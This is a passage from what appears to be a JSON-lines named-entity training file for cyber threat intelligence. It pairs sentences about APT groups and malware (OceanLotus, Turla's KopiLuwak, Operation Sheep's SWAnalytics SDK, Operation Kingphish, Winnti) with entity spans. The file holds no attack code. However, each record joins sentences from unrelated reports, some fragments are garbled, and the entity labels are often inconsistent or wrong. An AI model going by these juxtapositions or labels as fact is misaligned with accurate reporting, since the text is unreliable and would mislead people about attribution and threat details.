attacker controlled server jquerycodedownload.live/check.aspx\u201d . A high volume of redirections from the compromised site continues into mid-January 2017 . However , as this recent campaign indicates , the NewsBeef APT appears to have shifted its intrusion toolset aACT from BeEF and towards macro-enabled malicious Office documents , PowerSploit , and Pupy . Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net . Its attack activities can be traced back to April 2012 . 
The OceanLotus reflects a very strong confrontational ability and willing to attack by keep evolving their techniques . These APT attacks and adopting confrontation measures will exist for a long time . OceanLotus\u2019 targets are global . OceanLotus have been actively using since at least early 2018 . OceanLotus malware family samples used no earlier than 2017 . we identified two methods to deliver the KerrDown downloader to targets . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon . While investigating KerrDown we found multiple RAR files containing a variant of the malware . Therefore , it is clear that the OceanLotus group works during weekdays and takes a break during the weekends . The group was first revealed and named by SkyEye Team in May 2015 . OceanLotus's targets include China's maritime institutions , maritime construction , scientific research institutes and shipping enterprises .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 24, "end": 33, "label": "Organization"}, {"start": 137, "end": 150, "label": "Vulnerability"}, {"start": 299, "end": 313, "label": "Vulnerability"}, {"start": 318, "end": 331, "label": "Vulnerability"}, {"start": 338, "end": 348, "label": "Malware"}, {"start": 397, "end": 403, "label": "Organization"}, {"start": 615, "end": 629, "label": "Indicator"}, {"start": 676, "end": 679, "label": "System"}, {"start": 680, "end": 688, "label": "Indicator"}, {"start": 816, "end": 824, "label": "Indicator"}, {"start": 872, "end": 879, "label": "Vulnerability"}, {"start": 882, "end": 895, "label": "Vulnerability"}, {"start": 990, "end": 1003, "label": "Organization"}, {"start": 1022, "end": 1035, "label": "Vulnerability"}, {"start": 1045, "end": 1059, "label": "Malware"}, {"start": 1099, "end": 1112, "label": "Organization"}, {"start": 1125, "end": 1132, "label": "Vulnerability"}, 
{"start": 1165, "end": 1178, "label": "Vulnerability"}, {"start": 1304, "end": 1311, "label": "Indicator"}, {"start": 1337, "end": 1342, "label": "Indicator"}, {"start": 1396, "end": 1400, "label": "System"}, {"start": 1439, "end": 1453, "label": "Vulnerability"}, {"start": 1520, "end": 1534, "label": "Indicator"}, {"start": 1565, "end": 1577, "label": "Indicator"}, {"start": 1737, "end": 1744, "label": "Vulnerability"}, {"start": 1745, "end": 1758, "label": "Vulnerability"}, {"start": 1776, "end": 1801, "label": "Indicator"}, {"start": 1804, "end": 1818, "label": "Indicator"}, {"start": 1992, "end": 2003, "label": "Organization"}, {"start": 2176, "end": 2186, "label": "Indicator"}, {"start": 2201, "end": 2220, "label": "Indicator"}, {"start": 2258, "end": 2266, "label": "Indicator"}, {"start": 2445, "end": 2454, "label": "Indicator"}, {"start": 2579, "end": 2592, "label": "Indicator"}, {"start": 2595, "end": 2603, "label": "Malware"}, {"start": 2634, "end": 2644, "label": "Organization"}, {"start": 2681, "end": 2692, "label": "Malware"}, {"start": 2701, "end": 2714, "label": "Malware"}, {"start": 2740, "end": 2749, "label": "Indicator"}, {"start": 2958, "end": 2970, "label": "Organization"}, {"start": 3112, "end": 3124, "label": "Organization"}, {"start": 3270, "end": 3280, "label": "Organization"}, {"start": 3364, "end": 3370, "label": "System"}, {"start": 3414, "end": 3424, "label": "Organization"}, {"start": 3756, "end": 3766, "label": "System"}, {"start": 3770, "end": 3782, "label": "Organization"}, {"start": 3789, "end": 3808, "label": "Malware"}, {"start": 3848, "end": 3858, "label": "System"}, {"start": 3880, "end": 3890, "label": "System"}, {"start": 3916, "end": 3925, "label": "Indicator"}, {"start": 3933, "end": 3941, "label": "Malware"}, {"start": 4010, "end": 4020, "label": "Organization"}, {"start": 4076, "end": 4086, "label": "Organization"}, {"start": 4094, "end": 4126, "label": "Organization"}, {"start": 4142, "end": 4149, "label": "Organization"}, 
{"start": 4154, "end": 4160, "label": "Organization"}, {"start": 4216, "end": 4226, "label": "Organization"}, {"start": 4353, "end": 4361, "label": "Indicator"}, {"start": 4380, "end": 4386, "label": "System"}, {"start": 4482, "end": 4494, "label": "Organization"}, {"start": 4618, "end": 4625, "label": "Organization"}, {"start": 4641, "end": 4651, "label": "Organization"}, {"start": 4798, "end": 4808, "label": "Organization"}, {"start": 4830, "end": 4840, "label": "Organization"}, {"start": 4868, "end": 4874, "label": "Malware"}, {"start": 4875, "end": 4882, "label": "Malware"}, {"start": 4899, "end": 4905, "label": "System"}, {"start": 4930, "end": 4951, "label": "Indicator"}, {"start": 4960, "end": 4986, "label": "Indicator"}, {"start": 4989, "end": 5015, "label": "Indicator"}, {"start": 5022, "end": 5047, "label": "Indicator"}, {"start": 5147, "end": 5159, "label": "Organization"}, {"start": 5213, "end": 5221, "label": "Organization"}, {"start": 5399, "end": 5407, "label": "Organization"}, {"start": 5445, "end": 5475, "label": "Malware"}, {"start": 5478, "end": 5489, "label": "Malware"}, {"start": 5500, "end": 5513, "label": "Malware"}, {"start": 5532, "end": 5540, "label": "Organization"}, {"start": 5602, "end": 5608, "label": "System"}, {"start": 5800, "end": 5808, "label": "Organization"}, {"start": 5902, "end": 5910, "label": "Organization"}, {"start": 5994, "end": 5999, "label": "Malware"}, {"start": 6004, "end": 6021, "label": "Malware"}, {"start": 6024, "end": 6035, "label": "Malware"}, {"start": 6042, "end": 6052, "label": "Malware"}, {"start": 6059, "end": 6067, "label": "Organization"}, {"start": 6214, "end": 6222, "label": "Organization"}, {"start": 6266, "end": 6275, "label": "Organization"}, {"start": 6327, "end": 6337, "label": "System"}, {"start": 6516, "end": 6526, "label": "Organization"}, {"start": 6547, "end": 6556, "label": "Organization"}, {"start": 6631, "end": 6638, "label": "System"}, {"start": 6650, "end": 6667, "label": "Indicator"}, 
{"start": 6712, "end": 6719, "label": "System"}, {"start": 6758, "end": 6766, "label": "Organization"}, {"start": 6812, "end": 6818, "label": "Malware"}, {"start": 6821, "end": 6824, "label": "Malware"}, {"start": 6827, "end": 6830, "label": "Malware"}, {"start": 6916, "end": 6921, "label": "Organization"}, {"start": 6960, "end": 6970, "label": "Organization"}, {"start": 7074, "end": 7082, "label": "Organization"}, {"start": 7297, "end": 7304, "label": "Organization"}, {"start": 7366, "end": 7374, "label": "Organization"}, {"start": 7573, "end": 7581, "label": "Organization"}, {"start": 7729, "end": 7739, "label": "Malware"}, {"start": 7761, "end": 7771, "label": "Indicator"}, {"start": 7898, "end": 7900, "label": "Indicator"}, {"start": 8003, "end": 8015, "label": "Organization"}, {"start": 8126, "end": 8134, "label": "Organization"}, {"start": 8236, "end": 8252, "label": "Malware"}, {"start": 8255, "end": 8266, "label": "Malware"}, {"start": 8273, "end": 8277, "label": "Malware"}, {"start": 8515, "end": 8525, "label": "Organization"}, {"start": 8653, "end": 8684, "label": "Organization"}, {"start": 8714, "end": 8725, "label": "Organization"}, {"start": 8747, "end": 8757, "label": "Organization"}, {"start": 8811, "end": 8821, "label": "Organization"}, {"start": 8914, "end": 8922, "label": "Indicator"}, {"start": 8980, "end": 8988, "label": "Indicator"}, {"start": 9155, "end": 9163, "label": "Indicator"}, {"start": 9263, "end": 9273, "label": "Organization"}, {"start": 9410, "end": 9422, "label": "Organization"}, {"start": 9447, "end": 9468, "label": "Organization"}, {"start": 9471, "end": 9492, "label": "Organization"}, {"start": 9495, "end": 9525, "label": "Organization"}, {"start": 9530, "end": 9550, "label": "Organization"}]} {"text": "Based on our telemetry , Kaspersky can reassemble ScarCruft\u2019s binary infection procedure . 
RedDrip Team (formerly SkyEye Team ) has been to OceanLotus to keep track of high strength , groupactivity , found it in the near future to Indochinese Peninsula countries since 2019 On April 1 , 2019 , RedDrip discovered a Vietnamese file name Hop dong sungroup.rar in the process of daily monitoring the attack activities of the OceanLotus . COCCOC is a Vietnam was founded in 2013 . In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks . Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file . these threat actors targeted a number of government agencies threat actors targeted a number of government agencies in East Asia . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Maudi Surveillance Operation which was previously reported in 2013 . specifically CVE-2018-0798 , before downloading subsequent payloads . The dropped PE file has the distinctive file name 8.t\u201d . The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above . These conflicts have even resulted in Haftar leading an attack on the capital city in April . The attackers have targeted a large number of organizations globally since early 2017 . Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities . 
Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected . Operation Parliament appears to be another symptom of escalating tensions in the Middle East region . The attackers have taken great care to stay under the radar , imitating another attack group in the region . With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East . The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware . The malware starts communicating with the C&C server by sending basic information about the infected machine . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants\u2019 rights in Qatar and Nepal . We refer to this campaign and the associated actor as Operation Kingphish Malik\u201d , in one of its written forms in Arabic , translates to King\u201d . It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers\u2019 rights in Qatar . 
It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . In the course of this email correspondence , the attacker \u2014 Safeena\u201d \u2014 then sent what appeared to be invitations to access several documents on Google Drive . The attackers were meticulous in making their phishing page as credible as possible . Among the targets of this campaign is the International Trade Union Confederation .", "spans": [{"start": 25, "end": 34, "label": "Organization"}, {"start": 50, "end": 61, "label": "Organization"}, {"start": 91, "end": 103, "label": "Organization"}, {"start": 114, "end": 125, "label": "Organization"}, {"start": 140, "end": 150, "label": "Organization"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 422, "end": 432, "label": "Organization"}, {"start": 435, "end": 441, "label": "Organization"}, {"start": 538, "end": 548, "label": "Organization"}, {"start": 676, "end": 681, "label": "Organization"}, {"start": 684, "end": 705, "label": "Organization"}, {"start": 708, "end": 727, "label": "Organization"}, {"start": 732, "end": 737, "label": "Organization"}, {"start": 768, "end": 775, "label": "Organization"}, {"start": 885, "end": 891, "label": "Organization"}, {"start": 913, "end": 923, "label": "Organization"}, {"start": 924, "end": 932, "label": "Organization"}, {"start": 948, "end": 957, "label": "Organization"}, {"start": 968, "end": 977, "label": "Organization"}, {"start": 994, "end": 1001, "label": "Vulnerability"}, {"start": 1002, "end": 1015, "label": "Vulnerability"}, {"start": 1094, "end": 1099, "label": "Organization"}, {"start": 1176, "end": 1189, "label": "Vulnerability"}, {"start": 1245, "end": 1247, "label": "Malware"}, {"start": 1283, "end": 1287, "label": "Indicator"}, {"start": 1354, "end": 1362, "label": "Organization"}, {"start": 1391, "end": 1399, "label": 
"Organization"}, {"start": 1459, "end": 1465, "label": "Organization"}, {"start": 1519, "end": 1528, "label": "Organization"}, {"start": 1603, "end": 1612, "label": "Organization"}, {"start": 1691, "end": 1700, "label": "Organization"}, {"start": 1730, "end": 1737, "label": "Organization"}, {"start": 1784, "end": 1795, "label": "Organization"}, {"start": 1798, "end": 1805, "label": "Organization"}, {"start": 1808, "end": 1825, "label": "Organization"}, {"start": 1830, "end": 1839, "label": "Organization"}, {"start": 1842, "end": 1868, "label": "Organization"}, {"start": 1871, "end": 1879, "label": "Organization"}, {"start": 1884, "end": 1905, "label": "Organization"}, {"start": 1908, "end": 1918, "label": "Organization"}, {"start": 1921, "end": 1934, "label": "Organization"}, {"start": 1937, "end": 1953, "label": "Organization"}, {"start": 1956, "end": 1976, "label": "Organization"}, {"start": 1979, "end": 2000, "label": "Organization"}, {"start": 2009, "end": 2026, "label": "Organization"}, {"start": 2039, "end": 2055, "label": "Organization"}, {"start": 2058, "end": 2069, "label": "Organization"}, {"start": 2190, "end": 2210, "label": "Organization"}, {"start": 2296, "end": 2305, "label": "Organization"}, {"start": 2470, "end": 2476, "label": "Organization"}, {"start": 2613, "end": 2620, "label": "Indicator"}, {"start": 2749, "end": 2756, "label": "Indicator"}, {"start": 2787, "end": 2790, "label": "System"}, {"start": 2860, "end": 2867, "label": "Indicator"}, {"start": 2896, "end": 2910, "label": "Malware"}, {"start": 2928, "end": 2937, "label": "Organization"}, {"start": 3010, "end": 3014, "label": "Indicator"}, {"start": 3400, "end": 3419, "label": "Organization"}, {"start": 3691, "end": 3700, "label": "Organization"}, {"start": 3855, "end": 3864, "label": "Organization"}, {"start": 4073, "end": 4078, "label": "System"}, {"start": 4100, "end": 4108, "label": "Organization"}, {"start": 4214, "end": 4223, "label": "Organization"}, {"start": 4352, "end": 4377, 
"label": "Organization"}]} {"text": "In addition , Kaspersky analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel . Both in the attacks against ITUC and in other occasions , Operation Kingphish approached selected targets over social media , prominently Facebook , and engaged in chat conversations with them on and off , sometimes over a period of several months . This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar . While there is a clear underlying Qatar migrant workers theme in Operation Sheep , it is also hypothetically possible that these attacks could have been perpetrated by a malicious actor affiliated to a different government with an interest in damaging the reputation of the State of Qatar . Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . In theory , Shun Wang Technologies could have collected a third of China\u2019s population names and contact numbers if not more . 
With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November\u2019s Single\u2019s Day and December\u2019s Asian online shopping fest . This paper will cover the discovery of this campaign , dubbed \u2018Operation Sheep\u2019 , and an analysis of SWAnalytics . In mid-September , an app named \u2018Network Speed Master\u2019 stood out on our radar with its rather unusual behavior patterns . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in . With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . Operation Sheep is the first campaign we have observed in the wild that abuses similar concept since our MitD publication . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json\u201d . In order to understand SWAnalytics\u2019 impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . 
Data points span from September 2018 to January 2019 where we observed over 17 million downloads in just five months . In China alone , we have seen underground market sheep shavers\u201d ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links . In Operation Sheep\u2019s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement . According to Cheetah Mobile\u2019s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . Webinjects targeting Japan , a country we haven\u2019t seen targeted by Panda Banker before . Japan is no stranger to banking malware . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . This post was our first analysis of the first Panda Banker campaign that we\u2019ve seen to target financial institutions in Japan . Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities , like the military , governments , defense industries , and the media . we believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows\u2019 systems . we found two malicious iOS applications in Operation Pawn Storm . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . 
The obvious goal of the SEDNIT-related spyware is to steal personal data , record audio , make screenshots , and send them to a remote command-and-control (C&C) server .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 146, "end": 155, "label": "Organization"}, {"start": 186, "end": 190, "label": "Organization"}, {"start": 216, "end": 235, "label": "Organization"}, {"start": 269, "end": 281, "label": "Malware"}, {"start": 284, "end": 304, "label": "Malware"}, {"start": 635, "end": 650, "label": "Organization"}, {"start": 868, "end": 885, "label": "Organization"}, {"start": 972, "end": 979, "label": "Vulnerability"}, {"start": 984, "end": 999, "label": "Vulnerability"}, {"start": 1071, "end": 1074, "label": "Malware"}, {"start": 1083, "end": 1094, "label": "Indicator"}, {"start": 1133, "end": 1140, "label": "System"}, {"start": 1210, "end": 1223, "label": "Organization"}, {"start": 1226, "end": 1235, "label": "Organization"}, {"start": 1238, "end": 1254, "label": "Organization"}, {"start": 1261, "end": 1277, "label": "Organization"}, {"start": 1314, "end": 1325, "label": "Indicator"}, {"start": 1517, "end": 1526, "label": "Organization"}, {"start": 1671, "end": 1680, "label": "Organization"}, {"start": 1782, "end": 1789, "label": "Vulnerability"}, {"start": 2023, "end": 2040, "label": "Organization"}, {"start": 2108, "end": 2130, "label": "Organization"}, {"start": 2203, "end": 2209, "label": "Indicator"}, {"start": 2403, "end": 2414, "label": "Indicator"}, {"start": 2458, "end": 2469, "label": "Indicator"}, {"start": 2491, "end": 2498, "label": "System"}, {"start": 2597, "end": 2613, "label": "Indicator"}, {"start": 2786, "end": 2797, "label": "Indicator"}, {"start": 2870, "end": 2885, "label": "Organization"}, {"start": 3044, "end": 3055, "label": "Indicator"}, {"start": 3223, "end": 3234, "label": "Indicator"}, {"start": 3355, "end": 3367, "label": "Indicator"}, {"start": 3705, "end": 3719, "label": "Organization"}, {"start": 3833, "end": 
3842, "label": "Organization"}, {"start": 4036, "end": 4043, "label": "Indicator"}, {"start": 4046, "end": 4052, "label": "Indicator"}, {"start": 4071, "end": 4082, "label": "Indicator"}, {"start": 4116, "end": 4121, "label": "Organization"}, {"start": 4136, "end": 4148, "label": "Malware"}, {"start": 4213, "end": 4218, "label": "Organization"}, {"start": 4289, "end": 4301, "label": "Indicator"}, {"start": 4381, "end": 4393, "label": "Indicator"}, {"start": 4427, "end": 4434, "label": "Indicator"}, {"start": 4435, "end": 4442, "label": "Indicator"}, {"start": 4521, "end": 4527, "label": "Indicator"}, {"start": 4532, "end": 4539, "label": "Indicator"}, {"start": 4604, "end": 4616, "label": "Indicator"}, {"start": 4652, "end": 4674, "label": "Organization"}, {"start": 4686, "end": 4706, "label": "Organization"}, {"start": 4720, "end": 4728, "label": "Organization"}, {"start": 4733, "end": 4742, "label": "Organization"}, {"start": 4818, "end": 4826, "label": "Organization"}, {"start": 4829, "end": 4840, "label": "Organization"}, {"start": 4843, "end": 4861, "label": "Organization"}, {"start": 4872, "end": 4877, "label": "Organization"}, {"start": 4992, "end": 4998, "label": "Indicator"}, {"start": 5025, "end": 5034, "label": "Organization"}, {"start": 5134, "end": 5140, "label": "Indicator"}, {"start": 5153, "end": 5165, "label": "Indicator"}, {"start": 5225, "end": 5231, "label": "Indicator"}, {"start": 5249, "end": 5257, "label": "Indicator"}, {"start": 5284, "end": 5298, "label": "Organization"}, {"start": 5319, "end": 5332, "label": "Organization"}]} {"text": "Secureworks researchers investigated activities associated with the BRONZE BUTLER (also known as Tick) threat group , which likely originates in the People . To learn more about this campaign , you may refer to our report , Operation Pawn Storm Using Decoys to Evade Detection . 
Additionally , we discovered a new DNS hijacking technique that we assess with moderate confidence is connected to the actors behind Sea Turtle . Talos now has moderate confidence that the threat actors behind Sea Turtle have been using another DNS hijacking technique . This technique was also observed against a government organizations in the Middle East and North African region . Cisco telemetry confirmed that the actors behind Sea Turtle maintained access to the ICS-Forth network from an operational command and control (C2) node . Our telemetry indicates that the actors maintained access in the ICS-Forth network through at least April 24 , five days after the statement was publicly released . This full-blown spying framework consists of two packages named \u2018Tokyo\u2019 and \u2018Yokohama\u2019 . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . The first confirmed date when TajMahal samples were seen on a victim\u2019s machine is August 2014 . 
More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 68, "end": 81, "label": "Organization"}, {"start": 261, "end": 276, "label": "Organization"}, {"start": 314, "end": 317, "label": "Indicator"}, {"start": 398, "end": 404, "label": "Organization"}, {"start": 425, "end": 430, "label": "Organization"}, {"start": 524, "end": 527, "label": "Indicator"}, {"start": 664, "end": 669, "label": "Organization"}, {"start": 799, "end": 811, "label": "Malware"}, {"start": 852, "end": 858, "label": "Organization"}, {"start": 1048, "end": 1055, "label": "Indicator"}, {"start": 1060, "end": 1070, "label": "Indicator"}, {"start": 1110, "end": 1118, "label": "Indicator"}, {"start": 1235, "end": 1243, "label": "Indicator"}, {"start": 1320, "end": 1328, "label": "Indicator"}, {"start": 1363, "end": 1372, "label": "Organization"}]} {"text": "However , an investigation by Symantec has found that Butterfly has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number . The dropper first appeared in mid-July , suggesting that this APT activity is potentially ongoing , with Turla actively targeting G20 participants and/or those with interest in the G20 , including member nations , journalists , and policymakers . Turla is a well-documented , long operating APT group that is widely believed to be a Russian state-sponsored organization . Turla is perhaps most notoriously suspected as responsible for the breach of the United States Central Command in 2008 . More recently Turla was accused of breaching RUAG , a Swiss technology company , in a public report published by GovCERT.ch . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . 
Assuming this variant of KopiLuwak has been observed in the wild , there are a number of ACTs it may have been delivered including some of Turla\u2019s previous attack methods such as spear phishing or via a watering hole . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists . Turla's goal could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . Despite the added capabilities , we still agree with Kaspersky that this backdoor is likely used as an initial reconnaissance tool and would probably be used as a staging point to deploy one of Turla\u2019s more fully featured implants . Turla is a complex cyberattack platform focused predominantly on diplomatic and government-related targets , particularly in the Middle East , Central and Far East Asia , Europe , North and South America and former Soviet bloc nations . We didn\u2019t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . 
Moreover , Turla now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak .", "spans": [{"start": 30, "end": 38, "label": "Organization"}, {"start": 54, "end": 63, "label": "Organization"}, {"start": 308, "end": 313, "label": "Organization"}, {"start": 333, "end": 336, "label": "Organization"}, {"start": 450, "end": 455, "label": "Organization"}, {"start": 575, "end": 580, "label": "Organization"}, {"start": 710, "end": 715, "label": "Organization"}, {"start": 741, "end": 745, "label": "Organization"}, {"start": 809, "end": 819, "label": "Organization"}, {"start": 893, "end": 905, "label": "Indicator"}, {"start": 932, "end": 942, "label": "Organization"}, {"start": 1127, "end": 1134, "label": "Organization"}, {"start": 1226, "end": 1235, "label": "Organization"}, {"start": 1331, "end": 1342, "label": "Organization"}, {"start": 1345, "end": 1352, "label": "Organization"}, {"start": 1431, "end": 1446, "label": "Organization"}, {"start": 1561, "end": 1570, "label": "Indicator"}, {"start": 1638, "end": 1650, "label": "Indicator"}, {"start": 1701, "end": 1713, "label": "Indicator"}, {"start": 1752, "end": 1755, "label": "System"}, {"start": 1768, "end": 1791, "label": "Indicator"}, {"start": 1837, "end": 1847, "label": "Indicator"}, {"start": 1870, "end": 1882, "label": "Indicator"}, {"start": 1962, "end": 1971, "label": "Indicator"}, {"start": 2001, "end": 2011, "label": "Organization"}, {"start": 2143, "end": 2155, "label": "Indicator"}, {"start": 2179, "end": 2188, "label": "Indicator"}, {"start": 2233, "end": 2236, "label": "System"}, {"start": 2361, "end": 2370, "label": "Organization"}, {"start": 2502, "end": 2509, "label": "Organization"}, {"start": 2541, "end": 2546, "label": "Organization"}, {"start": 2829, "end": 2841, "label": "Indicator"}, {"start": 2862, "end": 2873, "label": "Indicator"}, {"start": 2903, "end": 2914, "label": "Indicator"}, {"start": 2939, "end": 2959, "label": "Indicator"}, {"start": 2960, "end": 2966, "label": 
"Malware"}, {"start": 2980, "end": 2985, "label": "Organization"}]} {"text": "Talos assesses with high confidence that Group 123 was responsible for six campaigns . These campaign-related VPSs are located in South Africa .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 41, "end": 50, "label": "Organization"}, {"start": 110, "end": 114, "label": "System"}]} {"text": "Attacks launched by Scarlet Mimic were publicly exposed on 2013 in a Trend Micro report about the FakeM Trojan . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems .", "spans": [{"start": 20, "end": 33, "label": "Organization"}, {"start": 69, "end": 80, "label": "Organization"}, {"start": 98, "end": 103, "label": "System"}, {"start": 104, "end": 110, "label": "System"}, {"start": 146, "end": 152, "label": "Indicator"}]} {"text": "Finally , Talos identified a 6th campaign that is also linked to Group 123 . The PowerShell version of the Trojan also has the ability to get screenshots .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 65, "end": 74, "label": "Organization"}, {"start": 81, "end": 91, "label": "System"}, {"start": 107, "end": 113, "label": "Malware"}]} {"text": "As Talos observed at the beginning of 2017 , Group 123 started a campaign corresponding with the new year in 2018 . The Trojan is quite similar to the .NET RocketMan Trojan Obviously and can handle the same commands; additionally , it includes the #screen\u201d command to take a screenshot .", "spans": [{"start": 3, "end": 8, "label": "Organization"}, {"start": 45, "end": 54, "label": "Organization"}, {"start": 120, "end": 126, "label": "Malware"}, {"start": 151, "end": 155, "label": "System"}, {"start": 156, "end": 165, "label": "Malware"}, {"start": 166, "end": 172, "label": "Malware"}]} {"text": "Last month , researchers at Kaspersky reported on a Lazarus APT campaign targeting both macOS and Windows users . 
The usage of KopiLuwak , a well-known and exclusive artefact previously used by the Turla group , makes us attribute this campaign to this actor with high confidence .", "spans": [{"start": 28, "end": 37, "label": "Organization"}, {"start": 52, "end": 59, "label": "Organization"}, {"start": 127, "end": 136, "label": "Malware"}, {"start": 198, "end": 203, "label": "Organization"}]} {"text": "Cylance uncovered several bespoke backdoors deployed by the OceanLotus APT Group a.k.a APT32 , Cobalt Kitty . Winnti mode of operation to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously . Hackers usually take precautions , which experts refer to as Opsec .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 60, "end": 70, "label": "Organization"}, {"start": 87, "end": 92, "label": "Organization"}, {"start": 95, "end": 107, "label": "Organization"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 180, "end": 199, "label": "Organization"}, {"start": 252, "end": 277, "label": "Organization"}, {"start": 315, "end": 322, "label": "Organization"}]} {"text": "While continuing to monitor activity of the OceanLotus APT Group , Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file . The Winnti group\u2019s Opsec was dismal to say the least . This mode of operation is typical of many hacker groups\u2014and especially of Winnti .", "spans": [{"start": 44, "end": 54, "label": "Organization"}, {"start": 67, "end": 74, "label": "Organization"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 311, "end": 317, "label": "Organization"}, {"start": 343, "end": 349, "label": "Organization"}]} {"text": "Gobelin Panda , a.k.a Goblin Panda , is a group that has been identified by CrowdStrike as a Chinese threat actor . 
They are a very , very persistent group , \u201d says Costin Raiu , who has been watching Winnti since 2011 .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 22, "end": 34, "label": "Organization"}, {"start": 76, "end": 87, "label": "Organization"}, {"start": 165, "end": 176, "label": "Organization"}, {"start": 201, "end": 207, "label": "Organization"}]} {"text": "CrowdStrike observed Goblin Panda activity spike as tensions among South China Sea nations has risen . Raiu and his team have followed the digital tracks left behind by some of the Winnti hackers .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 21, "end": 33, "label": "Organization"}, {"start": 103, "end": 107, "label": "Organization"}, {"start": 181, "end": 187, "label": "Organization"}]} {"text": "This confirms Tropic Trooper is using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them . One government official puts it very matter-of-factly: Winnti is very specific to Germany .", "spans": [{"start": 14, "end": 28, "label": "Organization"}, {"start": 38, "end": 48, "label": "System"}, {"start": 113, "end": 124, 